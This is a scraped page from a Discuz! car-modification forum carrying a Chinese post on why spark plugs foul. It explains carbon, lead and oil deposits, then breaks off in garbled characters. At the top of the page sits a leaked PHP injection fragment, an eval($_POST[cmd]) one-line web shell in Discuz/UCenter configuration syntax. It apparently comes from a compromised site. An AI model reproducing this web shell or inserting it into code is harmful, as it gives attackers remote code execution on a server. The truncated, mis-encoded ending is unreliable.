');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 火花塞為何積污 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

火花塞為何積污

眾所周知,在維護和保養汽油車時,常發現火花塞上有很多積碳。火花塞是汽油機釋放高壓電的終端,具有使燃燒室內被壓縮了的混合氣發生一系列物理、化學變化進而形成火焰的能力,其性能直接影響發動機的正常燃燒。由於火花塞的工作環境和工作條件十分惡劣,燃燒產物聚積在火花塞絕緣體上,並影響火花塞正常跳火,這種燃燒後新產物的聚積,我們稱之為火花塞的積污。 火花塞的積污一般分為碳污、鉛污和油污三種1、碳污: 碳污是汽油機長期低速、低負荷且空燃比過濃,發生不完全燃燒時的產物,它是一種軟軟的碳黑,附著在火花塞的絕緣體上。當這種物質將絕緣體表面全部遮住時,就會逐漸降低以至於破壞火花塞電極間的絕緣能力,影響火花塞的跳火。當絕緣小於0.5-1M歐姆以下時,火花塞就不可能有可靠çš
返回列表